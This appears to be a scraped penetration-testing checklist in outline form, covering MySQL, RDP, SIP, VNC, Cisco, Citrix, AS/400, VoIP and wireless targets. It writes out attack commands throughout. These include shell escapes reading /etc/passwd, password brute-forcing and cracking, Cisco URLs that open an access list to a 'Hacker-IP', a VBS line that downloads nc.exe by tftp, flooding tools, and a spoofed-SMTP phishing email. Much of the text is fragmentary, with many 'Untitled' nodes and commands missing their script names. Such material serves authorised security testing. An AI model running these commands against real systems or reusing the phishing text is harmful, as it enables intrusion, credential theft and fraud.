SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;, Break into a shell, mysql> \! cat /etc/passwd, mysql> \! bash

SQL injection,, http://target/ expected_string database,,

References., Design Weaknesses, MySQL running as root, Exposed publicly on Internet,,

RDesktop port 3389 open

Rdesktop Enumeration, Remote Desktop Connection

Rdestop Bruteforce, TSGrinder, tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address, Tscrack

Sybase Port 5000+ open

Sybase Enumeration, sybase-version ip_address from NGS

Sybase Vulnerability Assessment, Use DBVisualiser, Sybase Security checksheet, Copy output into excel spreadsheet, Evaluate mis-configured parameters, Manual sql input of previously reported vulnerabilties, Advanced SQL Injection in SQL Server, More Advanced SQL Injection, NGS Squirrel for Sybase

SIP Port 5060 open

SIP Enumeration, netcat, nc IP_Address Port, sipflanker, python 192.168.1-254, Sipscan, smap, smap IP_Address/Subnet_Mask, smap -o IP_Address/Subnet_Mask, smap -l IP_Address

SIP Packet Crafting etc., sipsak, Tracing paths: - sipsak -T -s sip:usernaem@domain, Options request:- sipsak -vv -s sip:username@domain, Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain, siprogue

SIP Vulnerability Scanning/ Brute Force, tftp bruteforcer, Default dictionary file, ./ IP_Address Dictionary_file Maximum_Processes, VoIPaudit, SiVuS

Examine Configuration Files, SIPDefault.cnf, asterisk.conf, sip.conf, phone.conf, sip_notify.conf, <Ethernet address>.cfg, 000000000000.cfg, phone1.cfg, sip.cfg etc. etc.

VNC port 5900^ open

VNC Enumeration, Scans, 5900^ for direct access.5800 for HTTP access.

VNC Brute Force, Password Attacks, Remote, Password Guess, vncrack, Password Crack, vncrack, Packet Capture, Phoss, Local, Registry Locations, \HKEY_CURRENT_USER\Software\ORL\WinVNC3, \HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3, Decryption Key, 0x238210763578887

Exmine Configuration Files, .vnc, /etc/vnc/config, $HOME/.vnc/config, /etc/sysconfig/vncservers, /etc/vnc.conf

Tor Port 9001, 9030 open

Tor Node Checker, Ip Pages,

nmap NSE script

Jet Direct 9100 open


Password cracking

Rainbow crack


rainbow tables, rcrack c:\rainbowcrack\*.rt -f pwfile.txt


Cain & Abel

John the Ripper

./unshadow passwd shadow > file_to_crack

./john -single file_to_crack

./john -w=location_of_dictionary_file -rules file_to_crack

./john -show file_to_crack

./john --incremental:All file_to_crack


fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host | -f filename} -u Username -p Password | -H filename} i.e. fgdump.exe -u hacker -p hard_password -c -f target.txt




L0phtcrack (Note: - This tool was aquired by Symantec from @Stake and it is there policy not to ship outside the USA and Canada

Domain credentials


pwdump import

sam import

aiocracker [md5, sha1, sha256, sha384, sha512] hash dictionary_list

Vulnerability Assessment - Utilising vulnerability scanners all discovered hosts can then be tested for vulnerabilities. The result would then be analysed to determine if there any vulnerabilities that could be exploited to gain access to a target host on a network. A number of tests carried out by these scanners are just banner grabbing/ obtaining version information, once these details are known, the version is compared with any common vulnerabilities and exploits (CVE) that have been released and reported to the user. Other tools actually use manual pen testing methods and display the output received i.e. showmount -e ip_address would display the NFS shares available to the scanner whcih would then need to be verified by the tester.


Patch Levels

Confirmed Vulnerabilities, Severe, High, Medium, Low



Vulnerabilities, Severe, High, Medium, Low



Nessus (Linux), Nessus (Windows)

NGS Typhon

NGS Squirrel for Oracle

NGS Squirrel for SQL





Oval Interpreter


Security Manager +



Security Focus

Microsoft Security Bulletin

Common Vulnerabilities and Exploits (CVE)

National Vulnerability Database (NVD)

The Open Source Vulnerability Database (OSVDB), Standalone Database, Update URL

United States Computer Emergency Response Team (US-CERT)

Computer Emergency Response Team

Mozilla Security Information



PacketStorm Security

Security Tracker



Wireless Vulnerabilities and Exploits (WVE)



Fsecure Blog

g0ne blog


ha.ckers Blog

Jeremiah Grossman Blog


nCircle Blogs


Rational Security

Rise Security

Security Fix Blog

Software Vulnerability Exploitation Blog

Taosecurity Blog

AS/400 Auditing


Information Gathering, Nmap using common iSeries (AS/400) services., Unsecured services (Port;name;description), Untitled, Secured services (Port;name;description), Untitled, NetCat (old school technique), nc -v -z -w target ListOfServices.txt | grep "open", Banners Grabbing, Telnet, Using TN5250, Tools,, Mochasoft (trial), SDI (Trial), Debian package, IBM Client Access iSeries (install for Debian), Good How-To (in French)., Security-Database transcription in english, Download the Package from location, Convert RPM to DEB package, Aptitude install alien, alien iSeriesAccess-XX.rpm, Installing Deb Package, dpkg -i iSeriesAccess-xxx.deb, Running binary file, /opt/ibm/iSeriesAccess/bin/ibm5250, Sometimes this error occurs : error while loading, This means OpenMotif is missing, Add deb sid main non-free to /etc/apt/sources.list, aptitude update, aptitude install libmotif3, Remove added line from /etc/apt/sources.list and launch aptitute update, After installing OpenMotif, this error sometimes occurs : error while loading, This means Lib Path to iseriesaccess could not be reached, You should add iseriesaccess (/opt/ibm/iSeriesAccess/lib) to /etc/, run the command : ldconfig, Old School hack : LD_LIBRARY_PATH=/opt/ibm/iSeriesAccess/lib/:${LD_LIBRARY_PATH} /opt/ibm/iSeriesAccess/bin/ibm5250, Something else, Search for binary using dpkg -L iseriesaccess, FTP, echo quit | nc -v target 21, HTTP Banner, echo GET / | nc -v target 80, Browser HTTP administrative (if available), http://target:2001, http://target:2010, POP3, echo quit | nc target 110, Basic POP3 retriever, GetMail, SNMP, Snmpwalk, GFI Languard, SMTP, SMTPScan

Users Enumeration, Default AS/400 users accounts, Error messages, Telnet Login errors, Untitled, Untitled, Untitled, Untitled, Untitled, Untitled, Untitled, POP3 authentication Errors, CPF2204: User profile XXXX not found, CPF22E2: Password not correct for User profile XXXX, CPF22E3: User profile XXXX is disabled, CPF22E4: Password for User profile XXXX has expired, CPF22E5: No Password associated with User profile XXXX, Qsys symbolic link (if ftp is enabled), ftp target | quote stat | quote site namefmt 1, cd /, quote site listfmt 1, mkdir temp, quote rcmd ADDLNK OBJ('/qsys.lib') NEWLNK('/temp/qsys'), quote rcmd QSH CMD('ln -fs /qsys.lib /temp/qsys'), dir /temp/qsys/*.usrprf, Here you should list some profils, LDAP, Need os400-sys value from ibm-slapdSuffix, Think to grab it using FTP from (QIBM/UserData/OS400/DirSrv/, slapd.conf, Untitled, ibmslapd.conf, Resolve IP address., Telnet Value screen., Untitled, Tool to browse LDAP, LdapBrowser, LDAP Utility, Luma Ldap brower and more, LdapSearch (unix utility), Enumeration, Untitled, Untitled

Exploitation, CVE References,, CVE-2005-1244 - Severity : High - CVSS : 7.0, CVE-2005-1243 - Severity : Low - CVSS : 3.3, CVE-2005-1242 - Severity : Low - CVSS : 3.3, CVE-2005-1241 - Severity : High - CVSS : 7.0, CVE-2005-1240 - Severity : High - CVSS : 7.0, CVE-2005-1239 - Severity : Low - CVSS : 3.3, CVE-2005-1238 - Severity : High - CVSS : 9.0, CVE-2005-1182 - Severity : Low - CVSS : 3.3, CVE-2005-1133 - Severity : Low - CVSS : 3.3, CVE-2005-1025 - Severity : Low - CVSS : 3.3, CVE-2005-0868 - Severity : High - CVSS : 7.0, CVE-2005-0899 - Severity : Low - CVSS : 2.3, CVE-2002-1822 - Severity : Low - CVSS : 3.3, CVE-2002-1731 - Severity : Low - CVSS : 2.3, CVE-2000-1038 - Severity : Low - CVSS : 3.3, CVE-1999-1279 - Severity : Low - CVSS : 3.3, CVE-1999-1012 - Severity : Low - CVSS : 3.3, Access with Work Station Gateway, http://target:5061/WSG, Default AS/400 accounts., Network attacks (next release), DB2, QSHELL, Hijacking Terminals, Trojan attacks, Hacking from AS/400


System Value Security, Untitled, Untitled, Untitled, Untitled, Untitled, Untitled, Untitled, Untitled, Recommended value is 30, Untitled

Password Policy, Untitled, Untitled, Untitled, Untitled, Untitled, Untitled, Untitled, Untitled, Untitled

Audit level, Untitled, Recommended value is *SECURITY

Documentation, Users class, Untitled, System Audit Settings, Untitled, Special Authorities Definitions, Untitled

Bluetooth Specific Testing








bluebugger [OPTIONS] -a <addr> [MODE]




Exploit Frameworks

BlueMaho, Untitled


URL's,,,, Bluejackers, bluetooth-pentest,, Trifinite

Vulnerability Information, Common Vulnerabilities and Exploits (CVE), Vulnerabilties and exploit information relating to these products can be found here:

White Papers, Bluesnarfing

Cisco Specific Testing


Scan & Fingerprint., Untitled, Untitled, If SNMP is active, then community string guessing should be performed.

Credentials Guessing., Untitled, Attempt to guess Telnet, HTTP and SSH account credentials. Once you have non-privileged access, attempt to discover the 'enable' password. Also attempt to guess Simple Network Management Protocol (SNMP) community strings as they can lead to the config files of the router and therefore the 'enable' password!

Connect, Untitled, If you have determined the 'enable' password, then full access has been achieved and you can alter the configuration files of the router.

Check for bugs, Untitled, The most widely knwon/ used are: Nessus, Retina, GFI LanGuard and Core Impact. , There are also tools that check for specific flaws, such as the HTTP Arbitrary Access Bug: ios-w3-vuln

Further your attack, Untitled, running-config is the currently running configuration settings.  This gets loaded from the startup-config on boot.  This configuration file is editable and the changes are immediate.  Any changes will be lost once the router is rebooted.  It is this file that requires altering to maintain a non-permenant connection through to the internal network.  , startup-config is the boot up configuration file.  It is this file that needs altering to maintain a permenant  connection through to the internal network.  , Untitled, #> access-list 100 permit ip <IP> any

Scan & Fingerprint.

Port Scanning, nmap, Untitled, Untitled, Untitled, Other tools, Untitled, Usage: ./ciscos <IP> <class> [option], mass-scanner is a simple scanner for discovering Cisco devices within a given network range.

Fingerprinting, Untitled, BT cisco-torch-0.4b # -A, Untitled, Untitled, Untitled, TCP Port scan - nmap -sV -O -v -p 23,80 <IP> -oN TCP.version.txt, Untitled

Password Guessing.

Untitled, ./CAT  -h  <IP>  -a  password.wordlist, Untitled

Untitled, ./enabler <IP> [-u username] -p password /password.wordlist [port], Untitled

Untitled, BT tmp # hydra  -l  ""  -P  password.wordlist  -t  4  <IP>  cisco, Untitled

SNMP Attacks.

Untitled, ./CAT  -h  <IP>  -w  SNMP.wordlist, Untitled

Untitled, onesixytone  -c  SNMP.wordlist  <IP>, BT onesixtyone-0.3.2 # onesixtyone  -c  dict.txt Scanning 1 hosts, 64 communities [enable] Cisco Internetwork Operating System Software   IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1)  Technical Support:  Copyright (c) 1986-2005 by cisco Systems, Inc.  Compiled Fri 12-Aug [Cisco] Cisco Internetwork Operating System Software   IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1)  Technical Support:  Copyright (c) 1986-2005 by cisco Systems, Inc.  Compiled Fri 12-Aug

Untitled, snmapwalk  -v  <Version>  -c  <Community string>  <IP>, Untitled


Telnet, Untitled,  telnet  <IP>, Sample Banners, Untitled, Untitled


Web Browser, Untitled, This uses a combination of username and password to authenticate.  After browsing to the target device, an "Authentication Required" box will pop up with text similar to the following:, Authentication Required Enter username and password for "level_15_access" at User Name: Password:, Once logged in, you have non-privileged mode access and can even configure the router through a command interpreter., Cisco Systems Accessing Cisco 2610 "router", Show diagnostic log - display the diagnostic log., Monitor the router - HTML access to the command line interface at level 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15, Untitled, Untitled, VPN Device Manager (VDM) - Configure and monitor Virtual Private Networks (VPNs) through the web interface.

TFTP, Untitled, Untitled, ios-w3-vuln exploits the HTTP Access Bug to 'fetch' the running-config to your local TFTP server.  Both of these tools require the config files to be saved with default names., Untitled, ./ <options> <IP,hostname,network>, ./ <options> -F <hostlist>, Creating backdoors in Cisco IOS using TCL, Untitled, telnet <router IP>:Port, tclshell

Known Bugs.

Attack Tools, Untitled, Untitled, Untitled, Untitled, Untitled, Untitled, Untitled, Untitled, Untitled, Untitled, Untitled, Untitled, Untitled, Untitled, [13] - 0 Encoding IDS Bypass Vulnerability (UTF), [14] - Cisco IOS HTTP Denial of Service Vulnerability, Untitled, Web browse to the Cisco device: http://<IP>, Untitled, Untitled, Untitled, http://<IP>/level/99/configure/logging/trap/emergencies/CR, Untitled, http://<IP>/level/99/configure/access-list/100/permit/ip/host/<Hacker-IP>/any/CR, Untitled, ./ios-w3-vul fetch > /tmp/router.txt

Common Vulnerabilities and Exploits (CVE) Information, Vulnerabilties and exploit information relating to these products can be found here:

Configuration Files.

Untitled, Configuration files explained, The line that reads "enable password router", where "router" is the password, is the TTY console password which is superceeded by the enable secret password for remote access., Untitled, Untitled, Password Encryption Utilised, Untitled, Untitled, Boson GetPass, Cain, Online cracking, Untitled, Cain, John the Ripper, Entered into a text file as follows: username:$1$c2He$GWSkN1va8NJd2icna9TDA., Untitled, Configuration Testing Tools, Nipper, fwauto (Beta)


Cisco IOS Exploitation Techniques

Citrix Specific Testing

Citrix provides remote access services to multiple users across a wide range of platforms. The following information I have put together which will hopefully help you conduct a vulnerability assessment/ penetration test against Citrix


web search, Google (GHDB), ext:ica, inurl:citrix/metaframexp/default/login.asp, [WFClient] Password= filetype:ica, inurl:citrix/metaframexp/default/login.asp? ClientDetection=On, inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login", inurl:/Citrix/Nfuse17/, inurl:Citrix/MetaFrame/default/default.aspx, Google Hacks (Author Discovered), filetype:ica Username=, inurl:/Citrix/AccessPlatform/, inurl:LogonAgent/Login.asp, inurl:/CITRIX/NFUSE/default/login.asp, inurl:/Citrix/NFuse161/login.asp, inurl:/Citrix/NFuse16, inurl:/Citrix/NFuse151/, allintitle:MetaFrame XP Login, allintitle:MetaFrame Presentation Server Login, inurl:Citrix/~bespoke_company_name~/default/login.aspx?ClientDetection=On, allintitle:Citrix(R) NFuse(TM) Classic Login, allintitle:Citrix(R) NFuse(TM), allintitle:Citrix(r) NFuse(tm) 1.6, allintitle:Citrix(R) NFuse(TM) Options, allintitle:Citrix(R) NFuse(TM) Innlogging, Yahoo, originurlextension:ica

site search, Manual, review web page for useful information, review source for web page

generic, nmap -A -PN -p 80,443,1494 ip_address, amap -bqv ip_address port_no.

citrix specific,, perl ip_address, enum.js, enum.js apps TCPBrowserAdress=ip_address, connect.js, connect.js TCPBrowserAdress=ip_address Application=advertised-application, Citrix-pa-scan, perl ip_address [timeout] > pas.wri, pabrute.c, ./pabrute pubapp list app_list ip_address

Default Ports, TCP, Citrix XML Service, 80, Advanced Management Console, 135, Citrix SSL Relay, 443, ICA sessions, 1494, Server to server, 2512, Management Console to server, 2513, Session Reliability (Auto-reconnect), 2598, Note: - If 1494 is open, this would not normally be seen, License Management Console, 8082, License server, 27000, UDP, Clients to ICA browser service, 1604, Server-to-server, 1604

nmap nse scripts, citrix-enum-apps, nmap -sU --script=citrix-enum-apps -p 1604 <host>, citrix-enum-apps-xml, nmap --script=citrix-enum-apps-xml -p 80,443 <host>, citrix-enum-servers, nmap -sU --script=citrix-enum-servers -p 1604, citrix-enum-servers-xml, nmap --script=citrix-enum-servers-xml -p 80,443 <host>, citrix-brute-xml, nmap --script=citrix-brute-xml --script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443 <host>


Nessus, Plugins, CGI abuses, NetScaler web management interface ip address cookie disclosure, CGI abuses : Cross Site Scripting (XSS), Citrix MetaFrame XP login.asp, Citrix NFuse Launch Scripts, NetScaler web management XSS, Misc., Citrix Published Applications Remote Enumeration, NetScaler web management cookie information, Service Detection, Citrix Licensing Server detection, Citrix Server detection, Web Servers, Citrix NFuse Server launch.asp Arbitrary Server/ Port Redirect, NetScaler web management cookie cipher weakness, NetScaler web management interface detection, Unencrypted NetScaler web management interface, Windows, Citrix Licensing Server License Management Console, Citrix Password Manager Agent Secondary Credential Information Disclosurey, Citrix Password Manager Service Stored Credentials Disclosure, Citrix Presentation Server Remote Code Execution, Citrix Presentation Server Client Program Neighbourhood Agent (PNAgent) Denial of Service, Citrix web interface 4.6, 5.0, 5.0.1 XSS, NetScaler web management cookie cipher weakness, Novell Client TS/ Citrix Session Arbitrary User Profile Invocation, NetScaler web management interface detection, NetScaler web management login, Unencrypted NetScaler web management interface

Nikto, perl -host ip_address -port port_no., Untitled


Alter default .ica files, InitialProgram=cmd.exe, InitialProgram=explorer.exe

Enumerate and Connect, For applications identified by Citrix-pa-scan, Pas, Requires pas.wri to be present in the same directory (obtained from the output using Citrix-pa-scan), Writes output to pas_results.wri, For published applications with a Citrix client when the master browser is non-public., Citrix-pa-proxy, IP_to_proxy_to (i.e. remote server)

Manual Testing, Create Batch File (cmd.bat), 1, cmd.exe, 2, echo off, command, echo on, Host Scripting File (cmd.vbs), Option Explicit, Dim objShell, objShell.Run "%comspec% /k", WScript.Quit, alternative functionality, objShell.Run "%comspec% /k c: & dir", objShell.Run "%comspec% /k c: & cd temp & dir >temp.txt & notepad temp.txt", objShell.Run "%comspec% /k c: & tftp -i ip_address GET nc.exe" :-), iKat, Integrated Kiosk Attack Tool, Reconnaissance, FileSystem Links, Common Dialogs, Application Handlers, Browser Plugins, iKAT Tools, AT Command - priviledge escalation, AT HH:MM /interactive "cmd.exe", AT HH:MM /interactive %comspec% /k, Untitled, Keyboard Shortcuts/ Hotkeys, Ctrl + h – View History, Ctrl + n – New Browser, Shift + Left Click – New Browser, Ctrl + o – Internet Address (browse feature), Ctrl + p – Print (to file), Right Click (Shift + F10), Save Image As, View Source, F1 – Jump to URL, SHIFT+F1: Local Task List, SHIFT+F2: Toggle Title Bar, SHIFT+F3: Close Remote Application, CTRL+F1: Displays Windows Security Desktop – Ctrl+Alt+Del, CTRL+F2: Remote Task List, CTRL+F3: Remote Task Manager – Ctrl+Shift+ESC, ALT+F2: Cycle through programs, ALT+PLUS: Alt+TAB, ALT+MINUS: ALT+SHIFT+TAB

Brute Force

bforce.js, bforce.js TCPBrowserAddress=ip_address usernames=user1,user2 passwords=pass1,pass2, bforce.js HTTPBrowserAddress=ip_address userfile=file.txt passfile=file.txt, Untitled

Review Configuration Files

Application server configuration file, appsrv.ini, Location, <profile path>\Application Data\ICAClient, /usr/lib/ICAClient/config/appsrv.ini, $HOME/.ICAClient/appsrv.ini, Other ..., World writeable, Citrix Server Allows Key Logging Functionality,, perl wfcwin32.log, LogKeyboard=On, LogAppend=On, Review other files, wfcwin32.log, Mini-database containing published apps available, <profile path>\Application Data\ICAClient, Other ..., Sample file

Program Neighborhood configuration file, pn.ini, Location, <profile path>\Application Data\ICAClient, /usr/lib/ICAClient/config/pn.ini, Other ..., Review other files, .idx files, .vl files, The encrypted username, password, and domain name, Sample file

Citrix ICA client configuration file, wfclient.ini, Location, <profile path>\Application Data\ICAClient, /usr/lib/ICAClient/config/wfclient. ini, $HOME/.ICAClient/wfclient.ini


Vulnerabilities, Art of Hacking, Common Vulnerabilities and Exploits (CVE), Sample file, Untitled,, OSVDB,[vuln_title]=Citrix&search[text_type]=titles&search[s_date]=&search[e_date]=&search[refid]=&search[referencetypes]=&search[vendors]=&kthx=searchSecunia, Secunia,,, SecurityFocus

Support, Citrix, Knowledge Base, Thinworld

Exploits, Milw0rm,, Art of Hacking, Citrix

Tools Resource, Zip file containing the majority of tools mentioned in this article into a zip file for easy download/ access

Network Backbone

Generic Toolset

Wireshark (Formerly Ethereal), Passive Sniffing, Usernames/Passwords, Email, POP3, SMTP, IMAP, FTP, HTTP, HTTPS, RDP, VOIP, Other, Filters, ip.src == ip_address, ip.dst == ip_address, tcp.dstport == port_no., ! ip.addr == ip_address, (ip.addr eq ip_address and ip.addr eq ip_address) and (tcp.port eq 1829 and tcp.port eq 1863)

Cain & Abel, Active Sniffing, ARP Cache Poisoning, Usernames/Passwords, Email, POP3, SMTP, IMAP, FTP, HTTP, HTTPS, RDP, VOIP, Other, DNS Poisoning, Routing Protocols

Cisco-Torch, ./ <options> <IP,hostname,network> or ./ <options> -F <hostlist>

NTP-Fingerprint, perl -t [ip_address]


p0f, ./p0f [ -f file ] [ -i device ] [ -s file ] [ -o file ] [ -w file ] [ -Q sock ] [ -u user ] [ -FXVONDUKASCMRqtpvdlr ] [ -c size ] [ -T nn ] [ 'filter rule' ]

Manual Check (Credentials required)

MAC Spoofing, mac address changer for windows, macchanger, Random Mac Address:- macchanger -r eth0, madmacs, smac, TMAC

Penetration - An exploit usually relates to the existence of some flaw or vulnerability in an application or operating system that if used could lead to privilege escalation or denial of service against the computer system that is being attacked. Exploits can be compiled and used manually or various engines exist that are essentially at the lowest level pre-compiled point and shoot tools. These engines do also have a number of other extra underlying features for more advanced users.

Password Attacks

Known Accounts, Identified Passwords, Unidentified Hashes

Default Accounts, Identified Passwords, Unidentified Hashes


Successful Exploits, Accounts, Passwords, Cracked, Uncracked, Groups, Other Details, Services, Backdoor, Connectivity

Unsuccessful Exploits

Resources, Securiteam, Exploits are sorted by year and must be downloaded individually, SecurityForest, Updated via CVS after initial install, GovernmentSecurity, Need to create and account to obtain access, Red Base Security, Oracle Exploit site only, Wireless Vulnerabilities & Exploits (WVE), Wireless Exploit Site, PacketStorm Security, Exploits downloadable by month and year but no indexing carried out., SecWatch, Exploits sorted by year and month, download seperately, SecurityFocus, Exploits must be downloaded individually, Metasploit, Install and regualrly update via svn, Milw0rm, Exploit archived indexed and sorted by port download as a whole - The one to go for!


Metasploit, Free Extra Modules, local copy

Manual SQL Injection, Understanding SQL Injection, SQL Injection walkthrough, SQL Injection by example, Blind SQL Injection, Advanced SQL Injection in SQL Server, More Advanced SQL Injection, Advanced SQL Injection in Oracle databases, SQL Cheatsheets, Untitled

SQL Power Injector


SPI Dynamics WebInspect

Core Impact

Cisco Global Exploiter

PIXDos, perl [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=M AC] [--destmac=MAC] [--port=n]



Server Specific Tests


Direct Access Interrogation, MS SQL Server, Ports, UDP, TCP, Version, SQL Server Resolution Service (SSRS), Other, osql, Attempt default/common accounts, Retrieve data, Extract sysxlogins table, Oracle, Ports, UDP, TCP, TNS Listener, VSNUM Converted to hex, Ping / version / status / devug / reload / services / save_config / stop, Leak attack, SQL Plus, Default Account/Passwords, Default SID's, MySQL, Ports, UDP, TCP, Version, Users/Passwords, mysql.user, DB2, Informix, Sybase, Other

Scans, Default Ports, Non-Default Ports, Instance Names, Versions

Password Attacks, Sniffed Passwords, Cracked Passwords, Hashes, Direct Access Guesses

Vulnerability Assessment, Automated, Reports, Vulnerabilities, Severe, High, Medium, Low, Manual, Patch Levels, Missing Patches, Confirmed Vulnerabilities, Severe, High, Medium, Low



Fingerprint, Manual, Automated

Spoofable, Telnet spoof, telnet target_IP 25helo target.commail from: XXXX@XXX.comrcpt to: administrator@target.comdataX-Sender: XXXX@XXX.comX-Originating-IP: []X-Originating-Email: []MIME-Version: 1.0To: <>From: < >Subject: Important! Account check requiredContent-Type: text/htmlContent-Transfer-Encoding: 7bitDear Valued Customer,The corporate network has recently gone through a critical update to the Active Directory, we have done this to increase security of the network against hacker attacks to protect your private information. Due to this, you are required to log onto the following website with your current credentials to ensure that your account does not expire.Please go to the following website and log in with your account details. <a href=></a>Online Security Manager.Target



Scanning, 500 UDP IPSEC, 1723 TCP PPTP, 443 TCP/SSL, nmap -sU -PN -p 500, ipsecscan

Fingerprinting, ike-scan --showbackoff

PSK Crack, ikeprobe, sniff for responses with C&A or ikecrack


Vulnerability Assessment, Automated, Reports, Vulnerabilities, Severe, High, Medium, Low, Manual, Patch Levels, Missing Patches, Confirmed Vulnerabilities, Severe, High, Medium, Low

Permissions, PUT /test.txt HTTP/1.0, CONNECT HTTP/1.0, POST HTTP/1.0Content-Type: text/plainContent-Length: 6


Fingerprinting, Other, HTTP, Commands, JUNK / HTTP/1.0, HEAD / HTTP/9.3, OPTIONS / HTTP/1.0, HEAD / HTTP/1.0, GET /images HTTP/1.0, PROPFIND / HTTP/1.0, Modules, WebDAV, ASP.NET, Frontpage, OWA, IIS ISAPI, PHP, OpenSSL, File Extensions, .ASP, .HTM, .PHP, .EXE, .IDQ, HTTPS, Commands, JUNK / HTTP/1.0, HEAD / HTTP/9.3, OPTIONS / HTTP/1.0, HEAD / HTTP/1.0, Commands, JUNK / HTTP/1.0, HEAD / HTTP/9.3, OPTIONS / HTTP/1.0, HEAD / HTTP/1.0, File Extensions, .ASP, .HTM, .PHP, .EXE, .IDQ

Directory Traversal,\

VoIP Security

Sniffing Tools


Cain & Abel






SIPv6 Analyzer





WIST - Web Interface for SIP Trace

Scanning and Enumeration Tools



IAX Enumerator




SIP Forum Test Framework (SFTF)


sipflanker, python 192.168.1-254





SMAP, smap IP_Address/Subnet_Mask, smap -o IP_Address/Subnet_Mask, smap -l IP_Address




VoIP GHDB Entries

VoIP Voicemail Database

Packet Creation and Flooding Tools

H.323 Injection Files





IAXFlooder, ./iaxflood sourcename destinationname numpackets

INVITE Flooder, ./inviteflood interface target_user target_domain ip_address_target no_of_packets


RTP Flooder







SIPsak, Tracing paths: - sipsak -T -s sip:usernaem@domain, Options request:- sipsak -vv -s sip:username@domain, Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain




TFTP Brute Force, perl <tftpserver> <filelist> <maxprocesses>

UDP Flooder, ./udpflood source_ip target_destination_ip src_port dest_port no_of_packets

UDP Flooder (with VLAN Support), ./udpflood source_ip target_destination_ip src_port dest_port TOS user_priority VLAN ID no_of_packets


Fuzzing Tools


Codenomicon VoIP Fuzzers

Fuzzy Packet

Mu Security VoIP Fuzzing Platform

ohrwurm RTP Fuzzer

PROTOS H.323 Fuzzer


SIP Forum Test Framework (SFTF)


Signaling Manipulation Tools

AuthTool, ./authtool captured_sip_msgs_file -d dictionary -r usernames_passwords -v

BYE Teardown

Check Sync Phone Rebooter


Registration Adder

Registration Eraser

Registration Hijacker





Media Manipulation Tools

RTP InsertSound, ./rtpinsertsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file

RTP MixSound, ./rtpmixsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file



Generic Software Suites

OAT Office Communication Server Tool Assessment

EnableSecurity VOIPPACK, Note: - Add-on for Immunity Canvas


URL's, Common Vulnerabilities and Exploits (CVE), Vulnerabilties and exploit information relating to these products can be found here:, Default Passwords, Hacking Exposed VoIP, Tool Pre-requisites, Hack Library, g711conversions, VoIPsa

White Papers, An Analysis of Security Threats and Tools in SIP-Based VoIP Systems, An Analysis of VoIP Security Threats and Tools, Hacking VoIP Exposed, Security testing of SIP implementations, SIP Stack Fingerprinting and Stack Difference Attacks, Two attacks against VoIP, VoIP Attacks!, VoIP Security Audit Program (VSAP)

Spirent ThreatEx

Wireless Penetration

Wireless Assessment. The following information should ideally be obtained/enumerated when carrying out your wireless assessment. All this information is needed to give the tester, (and hence, the customer), a clear and concise picture of the network you are assessing. A brief overview of the network during a pre-site meeting weith the customer should allow you to estimate the timescales required to carry the assessment out.

Site Map, RF Map, Lines of Sight, Signal Coverage, Standard Antenna, Directional Antenna, Physical Map, Triangulate APs, Satellite Imagery

Network Map, MAC Filter, Authorised MAC Addresses, Reaction to Spoofed MAC Addresses, Encryption Keys utilised, WEP, Key Length, Crack Time, Key, WPA/PSK, TKIP, Temporal Key Integrity Protocol, (TKIP), is an encryption protocol desgined to replace WEP, Key, Attack Time, AES, Advanced Encryption Standard (AES) is an encryption algorithm utilised for securing sensitive data., Key, Attack Time, 802.1x, Derivative of 802.1x in use, Access Points, ESSID, Extended Service Set Identifier, (ESSID). Utilised on wireless networks with an access point, Broadcast ESSIDs, BSSIDs, Basic service set identifier, (BSSID), utilised on ad-hoc wireless networks., Vendor, Channel, Associations, Rogue AP Activity, Wireless Clients, MAC Addresses, Vendor, Operating System Details, Adhoc Mode, Associations, Intercepted Traffic, Encrypted, Clear Text


./redirectpoison interface target_source_ip target_source_port "<contact_information i.e. sip:;line=xtrfgy>"

Wireless Toolkit

Wireless Discovery, Aerosol, Airfart, Aphopper, Apradar, BAFFLE, inSSIDer, iWEPPro, karma, KisMAC-ng, Kismet, MiniStumbler, Netstumbler, Vistumbler, Wellenreiter, Wifi Hopper, WirelessMon, WiFiFoFum

Packet Capture, Airopeek, Airpcap, Airtraf, Apsniff, Cain, Commview, Ettercap, Netmon, nmwifi, Wireshark

EAP Attack tools, eapmd5pass, eapmd5pass -w dictionary_file -r eapmd5-capture.dump, Untitled

Leap Attack Tools, asleap, thc leap cracker, anwrap

WEP/ WPA Password Attack Tools, Airbase, Aircrack-ptw, Aircrack-ng, Airsnort, cowpatty, FiOS Wireless Key Calculator, iWifiHack, KisMAC-ng, Rainbow Tables, wep attack, wep crack, wzcook

Frame Generation Software, Airgobbler, airpwn, Airsnarf, Commview, fake ap, void 11, wifi tap, wifitap -b <BSSID> [-o <iface>] [-i <iface> [-p] [-w <WEP key> [-k <key id>]] [-d [-v]] [-h], FreeRADIUS - Wireless Pwnage Edition

Mapping Software, Online Mapping, WIGLE, Skyhook, Tools, Knsgem

File Format Conversion Tools, ns1 recovery and conversion tool, warbable, warkizniz, warkizniz04b.exe [kismet.csv] [kismet.gps] [ns1 filename], ivstools

IDS Tools, WIDZ, War Scanner, Snort-Wireless, AirDefense, AirMagnet

WLAN discovery

Unencrypted WLAN, Visible SSID, Sniff for IP range, MAC authorised, MAC filtering, Spoof valid MAC, Linux, ifconfig [interface] hw ether [MAC], macchanger, Random Mac Address:- macchanger -r eth0, mac address changer for windows, madmacs, TMAC, SMAC, Hidden SSID, Deauth client, Aireplay-ng, aireplay -0 1 -a [Access Point MAC] -c [Client MAC] [interface], Commview, Tools > Node reassociation, Void11, void11_penetration wlan0 -D -t 1 -B [MAC]

